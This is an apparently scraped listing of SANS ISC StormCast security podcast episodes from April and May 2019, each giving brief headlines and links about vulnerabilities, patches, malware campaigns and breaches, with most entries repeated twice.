DSSuite - A Docker Container with Didier's Tools https://isc.sans.edu/forums/diary/DSSuite+A+Docker+Container+with+Didiers+Tools/24926/ Sqlite3 Vulnerability https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0777 NVidia Updates https://nvidia.custhelp.com/app/answers/detail/a_id/4797 Windows 10 FIDO2 Certified https://fidoalliance.org/microsoft-achieves-fido2-certification-for-windows-hello/ Google May Remove ADB Backup/Restore from Future Android Versions https://www.xda-developers.com/adb-backup-and-restore-depreciated/
5/13/20195 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, May 10th 2019

US DHS Warns of North Korean ELECTRICFISH Malware https://www.us-cert.gov/ncas/analysis-reports/AR19-129A Fake KeePass Site Spreading Malware https://twitter.com/berkcgoksel/status/1125727590440931329 Google Android Security Bulletin https://source.android.com/security/bulletin/2019-05-01 Three Anti-Virus Companies Breached https://www.advanced-intel.com/blog/top-tier-russian-hacking-collective-claims-breaches-of-three-major-anti-virus-companies
5/10/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, May 10th 2019

US DHS Warns of North Korean ELECTRICFISH Malware https://www.us-cert.gov/ncas/analysis-reports/AR19-129A Fake KeePass Site Spreading Malware https://twitter.com/berkcgoksel/status/1125727590440931329 Google Android Security Bulletin https://source.android.com/security/bulletin/2019-05-01 Three Anti-Virus Companies Breached https://www.advanced-intel.com/blog/top-tier-russian-hacking-collective-claims-breaches-of-three-major-anti-virus-companies
5/10/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, May 9th 2019

EMail Roulette May 2019 https://isc.sans.edu/forums/diary/Email+roulette+May+2019/24918/ Turla Lightneuron https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf Alpine Linux Docker Image root User Hard Coded Credentials https://talosintelligence.com/vulnerability_reports/TALOS-2019-0782 Worpress 5.2 Adds Digitially Signed Updates https://wordpress.org/support/wordpress-version/version-5-2/
5/9/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, May 9th 2019

EMail Roulette May 2019 https://isc.sans.edu/forums/diary/Email+roulette+May+2019/24918/ Turla Lightneuron https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf Alpine Linux Docker Image root User Hard Coded Credentials https://talosintelligence.com/vulnerability_reports/TALOS-2019-0782 Worpress 5.2 Adds Digitially Signed Updates https://wordpress.org/support/wordpress-version/version-5-2/
5/9/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, May 8th 2019

Jenkins Exploit Mines Cryptocurrencies https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916/ Confluence Vulnerablity Exploited to Delivery Cryptocurrency Miner with Rootkit https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/ Cisco Elastic Services Controller REST API Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190507-esc-authbypass Google Chrome History Manipulation Prevention https://groups.google.com/a/chromium.org/forum/?#!msg/blink-dev/T8d4_BRb2xQ/WSdOiOFcBAAJ
5/8/20194 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, May 8th 2019

Jenkins Exploit Mines Cryptocurrencies https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916/ Confluence Vulnerablity Exploited to Delivery Cryptocurrency Miner with Rootkit https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/ Cisco Elastic Services Controller REST API Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190507-esc-authbypass Google Chrome History Manipulation Prevention https://groups.google.com/a/chromium.org/forum/?#!msg/blink-dev/T8d4_BRb2xQ/WSdOiOFcBAAJ
5/8/20194 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, May 7th 2019

Decoding UTF-16 in UDF Files https://isc.sans.edu/forums/diary/Text+and+TNULeNULxNULtNUL/24912/ VMWare Fusion 11 Guest VM RCE https://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514/ Hackers Are Using Bad Passwords Too https://www.ankitanubhav.info/post/c2bruting Amazon S3 Discontinues Path Style Access https://www.bleepingcomputer.com/news/security/amazon-to-disable-s3-path-style-access-used-to-bypass-censorship/
5/7/20196 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, May 7th 2019

Decoding UTF-16 in UDF Files https://isc.sans.edu/forums/diary/Text+and+TNULeNULxNULtNUL/24912/ VMWare Fusion 11 Guest VM RCE https://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514/ Hackers Are Using Bad Passwords Too https://www.ankitanubhav.info/post/c2bruting Amazon S3 Discontinues Path Style Access https://www.bleepingcomputer.com/news/security/amazon-to-disable-s3-path-style-access-used-to-bypass-censorship/
5/7/20196 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, May 6th 2019

Git Ransomware https://www.theregister.co.uk/2019/05/03/git_ransomware_bitcoin/ DLink Ransomware Patch https://eu.dlink.com/de/de/support/support-news/2019/february/28/dns320_trojan_cr1pttor Jenkins Plugin Vulnerabilities https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/may/story-of-a-hundred-vulnerable-jenkins-plugins/ Malicious WPAD Domains https://blog.redteam.pl/2019/05/badwpad-and-wpad-pl-wpadblocking-com.html
5/5/20196 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, May 6th 2019

Git Ransomware https://www.theregister.co.uk/2019/05/03/git_ransomware_bitcoin/ DLink Ransomware Patch https://eu.dlink.com/de/de/support/support-news/2019/february/28/dns320_trojan_cr1pttor Jenkins Plugin Vulnerabilities https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/may/story-of-a-hundred-vulnerable-jenkins-plugins/ Malicious WPAD Domains https://blog.redteam.pl/2019/05/badwpad-and-wpad-pl-wpadblocking-com.html
5/5/20196 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, May 3rd 2019

New SAP Exploits Used to Target Exposed https://www.onapsis.com/10kblaze Cisco Patches SSH Default Credential Vulnerability in Nexus 9000 Switches https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-nexus9k-sshkey Current State of JavaScript Crypto Jacking https://blog.malwarebytes.com/cybercrime/2019/05/cryptojacking-in-the-post-coinhive-era/ D-Link Camera Vulnerabilities https://www.welivesecurity.com/2019/05/02/d-link-camera-vulnerability-video-stream/ Securepairs Promotes "Right to Repair" https://securepairs.org/
5/3/20196 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, May 3rd 2019

New SAP Exploits Used to Target Exposed https://www.onapsis.com/10kblaze Cisco Patches SSH Default Credential Vulnerability in Nexus 9000 Switches https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-nexus9k-sshkey Current State of JavaScript Crypto Jacking https://blog.malwarebytes.com/cybercrime/2019/05/cryptojacking-in-the-post-coinhive-era/ D-Link Camera Vulnerabilities https://www.welivesecurity.com/2019/05/02/d-link-camera-vulnerability-video-stream/ Securepairs Promotes "Right to Repair" https://securepairs.org/
5/3/20196 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, May 2nd 2019

RCE Vulnerability in Dell Support Assist https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/ Creston Multiple Vulnerabilities https://www.crestron.com/en-US/Security/Security_Advisories Polymorphic Skimmer Targeting 57 different Payment Gateways https://labs.sansec.io/2019/04/29/polymorphic-skimmer-57-payment-gateways/ More Attacks Against S/Mime and PGP Signed Email https://github.com/RUB-NDS/Johnny-You-Are-Fired/blob/master/paper/johnny-fired.pdf
5/2/20195 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, May 2nd 2019

RCE Vulnerability in Dell Support Assist https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/ Creston Multiple Vulnerabilities https://www.crestron.com/en-US/Security/Security_Advisories Polymorphic Skimmer Targeting 57 different Payment Gateways https://labs.sansec.io/2019/04/29/polymorphic-skimmer-57-payment-gateways/ More Attacks Against S/Mime and PGP Signed Email https://github.com/RUB-NDS/Johnny-You-Are-Fired/blob/master/paper/johnny-fired.pdf
5/2/20195 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, May 1st 2019

Sodinokibi Ransomware Exploits WebLogic Server Vulnerability https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html Facebook Leaking Sellers Exact Locations https://www.7elements.co.uk/resources/blog/facebooks-burglary-shopping-list/ Revive Adserver Deserialization Vulnerability https://www.revive-adserver.com/security/revive-sa-2019-001/ AutoMacTC: Automating Mac Forensics Triage https://www.crowdstrike.com/blog/automating-mac-forensic-triage/ Kroll Artifact Parser And Extractor (KAPE) https://learn.duffandphelps.com/kape
5/1/20195 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, May 1st 2019

Sodinokibi Ransomware Exploits WebLogic Server Vulnerability https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html Facebook Leaking Sellers Exact Locations https://www.7elements.co.uk/resources/blog/facebooks-burglary-shopping-list/ Revive Adserver Deserialization Vulnerability https://www.revive-adserver.com/security/revive-sa-2019-001/ AutoMacTC: Automating Mac Forensics Triage https://www.crowdstrike.com/blog/automating-mac-forensic-triage/ Kroll Artifact Parser And Extractor (KAPE) https://learn.duffandphelps.com/kape
5/1/20195 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, April 30th 2019

iLnkP2P Allows Access To Millions of Security Cameras https://hacked.camera Windows 10 Users Not Applying October Update https://reports.adduplex.com/#/r/2019-04 iFrame "Ransom Support" Attacks https://blog.trendmicro.com/trendlabs-security-intelligence/tech-support-scam-employs-new-trick-by-using-iframe-to-freeze-browsers/
4/30/20195 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, April 30th 2019

iLnkP2P Allows Access To Millions of Security Cameras https://hacked.camera Windows 10 Users Not Applying October Update https://reports.adduplex.com/#/r/2019-04 iFrame "Ransom Support" Attacks https://blog.trendmicro.com/trendlabs-security-intelligence/tech-support-scam-employs-new-trick-by-using-iframe-to-freeze-browsers/
4/30/20195 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, April 29th 2019

WebLogic Update https://isc.sans.edu/diary.html?storyid=24890 Docker Hub Breach https://success.docker.com/article/docker-hub-user-notification
4/29/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, April 29th 2019

WebLogic Update https://isc.sans.edu/diary.html?storyid=24890 Docker Hub Breach https://success.docker.com/article/docker-hub-user-notification
4/29/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, April 26th 2019

Unpatched Vulnerablity in WebLogic Exploited https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+Alert+WebLogic+Zero+Day/24880/ Collecting Windows Service Accounts https://isc.sans.edu/forums/diary/Service+Accounts+Redux+Collecting+Service+Accounts+with+PowerShell/24882/ Confluence Vulnerablity Exploited by GandGrab https://blog.alertlogic.com/active-exploitation-of-confluence-vulnerability-cve-2019-3396-dropping-gandcrab-ransomware/ New Micrsoft Security Baseline for Windows 10 / Windows Server https://blogs.technet.microsoft.com/secguide/2019/04/24/security-baseline-draft-for-windows-10-v1903-and-windows-server-v1903/
4/26/20195 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, April 26th 2019

Unpatched Vulnerablity in WebLogic Exploited https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+Alert+WebLogic+Zero+Day/24880/ Collecting Windows Service Accounts https://isc.sans.edu/forums/diary/Service+Accounts+Redux+Collecting+Service+Accounts+with+PowerShell/24882/ Confluence Vulnerablity Exploited by GandGrab https://blog.alertlogic.com/active-exploitation-of-confluence-vulnerability-cve-2019-3396-dropping-gandcrab-ransomware/ New Micrsoft Security Baseline for Windows 10 / Windows Server https://blogs.technet.microsoft.com/secguide/2019/04/24/security-baseline-draft-for-windows-10-v1903-and-windows-server-v1903/
4/26/20195 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, April 25th 2019

Rooting Out Unwanted Domain Admins With Powershell https://isc.sans.edu/forums/diary/Where+have+all+the+Domain+Admins+gone+Rooting+out+Unwanted+Domain+Administrators/24874/ Mac OS X-Protect Now Covering Windows Malware https://twitter.com/patrickwardle/status/1120771284286103552 Wifi Finder Leaks Hotspot Passwords https://techcrunch.com/2019/04/22/hotspot-password-leak/ Github Hosting Phishing Pages https://www.proofpoint.com/us/threat-insight/post/threat-actors-abuse-github-service-host-variety-phishing-kits RSA Webinar: The Five Most Dangerous New Attack Techniques and How to Counter Them https://www.rsaconference.com/videos/rsac-2019-the-five-most-dangerous-new-attack-techniques-and-how-to-counter-them-continued
4/25/20197 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, April 25th 2019

Rooting Out Unwanted Domain Admins With Powershell https://isc.sans.edu/forums/diary/Where+have+all+the+Domain+Admins+gone+Rooting+out+Unwanted+Domain+Administrators/24874/ Mac OS X-Protect Now Covering Windows Malware https://twitter.com/patrickwardle/status/1120771284286103552 Wifi Finder Leaks Hotspot Passwords https://techcrunch.com/2019/04/22/hotspot-password-leak/ Github Hosting Phishing Pages https://www.proofpoint.com/us/threat-insight/post/threat-actors-abuse-github-service-host-variety-phishing-kits RSA Webinar: The Five Most Dangerous New Attack Techniques and How to Counter Them https://www.rsaconference.com/videos/rsac-2019-the-five-most-dangerous-new-attack-techniques-and-how-to-counter-them-continued
4/25/20197 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, April 24th 2019

Decoding Malicious VBA Office Document Without Source Code https://isc.sans.edu/forums/diary/Malicious+VBA+Office+Document+Without+Source+Code/24870/ More Updates on "ShadowHammer" Supply Chain Attack https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/ A Malicious Sight in Google Sites https://www.netskope.com/blog/malicious-google-sites
4/24/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, April 24th 2019

Decoding Malicious VBA Office Document Without Source Code https://isc.sans.edu/forums/diary/Malicious+VBA+Office+Document+Without+Source+Code/24870/ More Updates on "ShadowHammer" Supply Chain Attack https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/ A Malicious Sight in Google Sites https://www.netskope.com/blog/malicious-google-sites
4/24/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, April 23rd 2019

.rar Files Exploiting ACE Vulneraiblity CVE-2018-20250 https://isc.sans.edu/forums/diary/rar+Files+and+ACE+Exploit+CVE201820250/24864/ Malware Senders Become Younger and Less Sophisticated (in German) https://www.heise.de/security/meldung/Malware-Verteiler-werden-immer-juenger-infizieren-sich-oft-selbst-4403823.html McAfee Antivirus Affected by April Windows Update Crashes http://kc.mcafee.com/corporate/index?page=content&id=KB91465 Rules to Protect Against Azure Blog Phishing in Outlook 365 https://malware-research.org/simple-rule-to-protect-against-spoofed-windows-net-phishing-attacks/ Windows 7 End of Support Messages https://www.windowslatest.com/2019/04/20/windows-7-users-are-now-receiving-the-end-of-support-notifications/
4/22/20195 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, April 23rd 2019

.rar Files Exploiting ACE Vulneraiblity CVE-2018-20250 https://isc.sans.edu/forums/diary/rar+Files+and+ACE+Exploit+CVE201820250/24864/ Malware Senders Become Younger and Less Sophisticated (in German) https://www.heise.de/security/meldung/Malware-Verteiler-werden-immer-juenger-infizieren-sich-oft-selbst-4403823.html McAfee Antivirus Affected by April Windows Update Crashes http://kc.mcafee.com/corporate/index?page=content&id=KB91465 Rules to Protect Against Azure Blog Phishing in Outlook 365 https://malware-research.org/simple-rule-to-protect-against-spoofed-windows-net-phishing-attacks/ Windows 7 End of Support Messages https://www.windowslatest.com/2019/04/20/windows-7-users-are-now-receiving-the-end-of-support-notifications/
4/22/20195 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, April 22nd 2019

Analyzing UDF Files Using Python https://isc.sans.edu/forums/diary/Analyzing+UDF+Files+with+Python/24860/ HTML Ping To Be Adopted By All Major Browsers https://webkit.org/blog/8821/link-click-analytics-and-privacy/ Microsoft to Modify Edge User Agent for Some Sites https://www.onmsft.com/news/new-edge-insider-browser-can-change-user-agent-strings-based-on-what-website-youre-visiting French Government Chat System Used Weak User Management https://m.heise.de/security/meldung/Tchap-Frankreichs-nicht-so-exklusiver-Regierungschat-4403961.html
4/22/20196 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, April 22nd 2019

Analyzing UDF Files Using Python https://isc.sans.edu/forums/diary/Analyzing+UDF+Files+with+Python/24860/ HTML Ping To Be Adopted By All Major Browsers https://webkit.org/blog/8821/link-click-analytics-and-privacy/ Microsoft to Modify Edge User Agent for Some Sites https://www.onmsft.com/news/new-edge-insider-browser-can-change-user-agent-strings-based-on-what-website-youre-visiting French Government Chat System Used Weak User Management https://m.heise.de/security/meldung/Tchap-Frankreichs-nicht-so-exklusiver-Regierungschat-4403961.html
4/22/20196 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, April 19th 2019

Malware Delivered As a UDF .img file https://isc.sans.edu/forums/diary/Malware+Sample+Delivered+Through+UDF+Image/24854/ Facebook Stored Passwords in Plain Text https://newsroom.fb.com/news/2019/03/keeping-passwords-secure/ Iranian Statesponsored Malware and Data Leaked https://misterch0c.blogspot.com/2019/04/apt34-oilrig-leak.html Windows 8 Live Tiles Domain Takeover https://www.golem.de/news/subdomain-takeover-microsoft-verliert-kontrolle-ueber-windows-kacheln-1904-140709.html
4/19/20196 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, April 19th 2019

Malware Delivered As a UDF .img file https://isc.sans.edu/forums/diary/Malware+Sample+Delivered+Through+UDF+Image/24854/ Facebook Stored Passwords in Plain Text https://newsroom.fb.com/news/2019/03/keeping-passwords-secure/ Iranian Statesponsored Malware and Data Leaked https://misterch0c.blogspot.com/2019/04/apt34-oilrig-leak.html Windows 8 Live Tiles Domain Takeover https://www.golem.de/news/subdomain-takeover-microsoft-verliert-kontrolle-ueber-windows-kacheln-1904-140709.html
4/19/20196 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, April 18th 2019

DNS Hijacking by Sea Turtle https://blog.talosintelligence.com/2019/04/seaturtle.html Broadcom Wifi Driver Vulnerabilities https://www.kb.cert.org/vuls/id/166939/ NamPoHyu Virus Infects Samba Servers https://www.bleepingcomputer.com/news/security/nampohyu-virus-ransomware-targets-remote-samba-servers/ Increased Attacks on Confluence https://twitter.com/DFNCERT/status/1118468599230943233
4/18/20195 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, April 18th 2019

DNS Hijacking by Sea Turtle https://blog.talosintelligence.com/2019/04/seaturtle.html Broadcom Wifi Driver Vulnerabilities https://www.kb.cert.org/vuls/id/166939/ NamPoHyu Virus Infects Samba Servers https://www.bleepingcomputer.com/news/security/nampohyu-virus-ransomware-targets-remote-samba-servers/ Increased Attacks on Confluence https://twitter.com/DFNCERT/status/1118468599230943233
4/18/20195 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, April 17th 2019

PoC Exploit for Windows 10 DHCP Client Vulnerability CVE-2019-0726 (russian) https://habr.com/ru/company/pt/blog/448378/ Oracle April 2019 Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html WiPro Breached Via Phishing Attacks https://krebsonsecurity.com/2019/04/experts-breach-at-it-outsourcing-giant-wipro/ IDA and GHydra Part 2 (Strings And Parameters) https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+2+strings+and+parameters/24848/
4/17/20195 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, April 17th 2019

PoC Exploit for Windows 10 DHCP Client Vulnerability CVE-2019-0726 (russian) https://habr.com/ru/company/pt/blog/448378/ Oracle April 2019 Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html WiPro Breached Via Phishing Attacks https://krebsonsecurity.com/2019/04/experts-breach-at-it-outsourcing-giant-wipro/ IDA and GHydra Part 2 (Strings And Parameters) https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+2+strings+and+parameters/24848/
4/17/20195 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, April 16th 2019

Common "False Positives" in DNS Query Logs https://isc.sans.edu/forums/diary/Odd+DNS+Requests+that+are+Normal/24844/ Adblock Plus Allows Filter List Providers to Inject Code in Pages https://armin.dev/blog/2019/04/adblock-plus-code-injection/ Executables in Polyglot DICOM Images https://github.com/d00rt/pedicom/blob/master/doc/Attacking_Digital_Imaging_and_Communication_in_Medicine_(DICOM)_file_format_standard_-_Markel_Picado_Ortiz_(d00rt).pdf Malicious/Misleading VPN Ads https://www.bleepingcomputer.com/news/security/mobile-vpns-promoted-by-you-are-infected-or-hacked-ads/
4/16/20197 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, April 16th 2019

Common "False Positives" in DNS Query Logs https://isc.sans.edu/forums/diary/Odd+DNS+Requests+that+are+Normal/24844/ Adblock Plus Allows Filter List Providers to Inject Code in Pages https://armin.dev/blog/2019/04/adblock-plus-code-injection/ Executables in Polyglot DICOM Images https://github.com/d00rt/pedicom/blob/master/doc/Attacking_Digital_Imaging_and_Communication_in_Medicine_(DICOM)_file_format_standard_-_Markel_Picado_Ortiz_(d00rt).pdf Malicious/Misleading VPN Ads https://www.bleepingcomputer.com/news/security/mobile-vpns-promoted-by-you-are-infected-or-hacked-ads/
4/16/20197 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, April 15th 2019

Configuring MTA-STS https://isc.sans.edu/forums/diary/Configuring+MTASTS+and+TLS+Reporting+For+Your+Domain/24840/ How to Find Hidden Cameras in Your AirBNB https://isc.sans.edu/forums/diary/How+to+Find+Hidden+Cameras+in+your+AirBNB/24834/ Insecure Storage of VPN Credentials https://www.kb.cert.org/vuls/id/192371/ Microsoft Patch Problems https://support.microsoft.com/en-us/help/4493472/windows-7-update-kb4493472 https://support.microsoft.com/en-us/help/4493446/windows-8-1-update-kb4493446 Internet Explorer XML External Entity Vulnerability http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
4/15/20196 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, April 15th 2019

Configuring MTA-STS https://isc.sans.edu/forums/diary/Configuring+MTASTS+and+TLS+Reporting+For+Your+Domain/24840/ How to Find Hidden Cameras in Your AirBNB https://isc.sans.edu/forums/diary/How+to+Find+Hidden+Cameras+in+your+AirBNB/24834/ Insecure Storage of VPN Credentials https://www.kb.cert.org/vuls/id/192371/ Microsoft Patch Problems https://support.microsoft.com/en-us/help/4493472/windows-7-update-kb4493472 https://support.microsoft.com/en-us/help/4493446/windows-8-1-update-kb4493446 Internet Explorer XML External Entity Vulnerability http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
4/15/20196 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, April 12th 2019

GMail Will Be Supporting MTA-STS and SMTP TLS Reporting https://tools.ietf.org/html/rfc8461 https://tools.ietf.org/html/rfc8460 https://www.zdnet.com/article/gmail-becomes-first-major-email-provider-to-support-mta-sts-and-tls-reporting/ Juniper Patch Fixes Static Password in Junos OS https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10923&actp=METADATA Uniden Commercial IP Camera Site Hosting Malware https://twitter.com/JayTHL/status/1116200014630596609
4/12/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, April 12th 2019

GMail Will Be Supporting MTA-STS and SMTP TLS Reporting https://tools.ietf.org/html/rfc8461 https://tools.ietf.org/html/rfc8460 https://www.zdnet.com/article/gmail-becomes-first-major-email-provider-to-support-mta-sts-and-tls-reporting/ Juniper Patch Fixes Static Password in Junos OS https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10923&actp=METADATA Uniden Commercial IP Camera Site Hosting Malware https://twitter.com/JayTHL/status/1116200014630596609
4/12/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, April 11th 2019

WPA3 Dragonblood Vulnerability http://papers.mathyvanhoef.com/dragonblood.pdf North Korean Trojan: HOPLIGHT https://www.us-cert.gov/ncas/analysis-reports/AR19-100A Gaza Cybergang Group1 "SneakyPastes" https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/
4/11/20197 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, April 11th 2019

WPA3 Dragonblood Vulnerability http://papers.mathyvanhoef.com/dragonblood.pdf North Korean Trojan: HOPLIGHT https://www.us-cert.gov/ncas/analysis-reports/AR19-100A Gaza Cybergang Group1 "SneakyPastes" https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/
4/11/20197 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, April 10th 2019

Microsoft and Adobe Patches https://isc.sans.edu/forums/diary/Microsoft+April+2019+Patch+Tuesday/24826/ https://helpx.adobe.com/security.html Fake "Food Poisoning" emails in Germany (in german) https://www.polizei-praevention.de/aktuelles/erneut-mails-mit-schadsoftware-gegen-gewerbetreibende-im-umlauf.html Vulnerability in Apache Axis https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/ Golang DLL Injection Vulnerability https://www.openwall.com/lists/oss-security/2019/04/09/1
4/9/20196 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, April 10th 2019

Microsoft and Adobe Patches https://isc.sans.edu/forums/diary/Microsoft+April+2019+Patch+Tuesday/24826/ https://helpx.adobe.com/security.html Fake "Food Poisoning" emails in Germany (in german) https://www.polizei-praevention.de/aktuelles/erneut-mails-mit-schadsoftware-gegen-gewerbetreibende-im-umlauf.html Vulnerability in Apache Axis https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/ Golang DLL Injection Vulnerability https://www.openwall.com/lists/oss-security/2019/04/09/1
4/9/20196 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, April 9th 2019

GHidra vs. IDA https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+1+the+decompilerunreachable+code/24822/ TrendMicro Patch https://success.trendmicro.com/solution/1122250 Dovecot Patch https://dovecot.org/list/dovecot-news/2019-March/000403.html Apache CVE-2019-0211 Exploit https://github.com/cfreal/exploits/tree/master/CVE-2019-0211-apache Using JavaScript in Exploits https://www.youtube.com/watch?v=HfpnloZM61I
4/9/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, April 9th 2019

GHidra vs. IDA https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+1+the+decompilerunreachable+code/24822/ TrendMicro Patch https://success.trendmicro.com/solution/1122250 Dovecot Patch https://dovecot.org/list/dovecot-news/2019-March/000403.html Apache CVE-2019-0211 Exploit https://github.com/cfreal/exploits/tree/master/CVE-2019-0211-apache Using JavaScript in Exploits https://www.youtube.com/watch?v=HfpnloZM61I
4/9/20195 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, April 8th 2019

Fake Office 365 Invoices Spread Ransomware https://isc.sans.edu/forums/diary/Fake+Office+365+Payment+Information+Update/24818/ Malware Hiding in .well-known directory https://www.zscaler.com/blogs/research/abuse-hidden-well-known-directory-https-sites Altering CT Images to Manipulate Diagnosis https://arxiv.org/pdf/1901.03597.pdf QT Framework RCE Vulnerability https://www.zerodayinitiative.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739
4/7/20196 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, April 8th 2019

Fake Office 365 Invoices Spread Ransomware https://isc.sans.edu/forums/diary/Fake+Office+365+Payment+Information+Update/24818/ Malware Hiding in .well-known directory https://www.zscaler.com/blogs/research/abuse-hidden-well-known-directory-https-sites Altering CT Images to Manipulate Diagnosis https://arxiv.org/pdf/1901.03597.pdf QT Framework RCE Vulnerability https://www.zerodayinitiative.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739
4/7/20196 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, April 5th 2019

New Waves of Scans Detected By An Old Rule https://isc.sans.edu/forums/diary/New+Waves+of+Scans+Detected+by+an+Old+Rule/24812/ Xiaomi GuardApp Vulnerable to Man in the Middle https://blog.checkpoint.com/2019/04/04/xiaomi-vulnerability-when-security-is-not-what-it-seems/ Xwo Web Scanner Hunting for MongoDB https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner Vulnerable SmartWatches "Defaced" https://api.heise.de/svc/embetty/tweet/1112326532939374593-images-0 https://www.heise.de/newsticker/meldung/Vidimensio-Smartwatches-Der-Sicherheits-Alptraum-geht-weiter-4359967.html
4/4/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, April 5th 2019

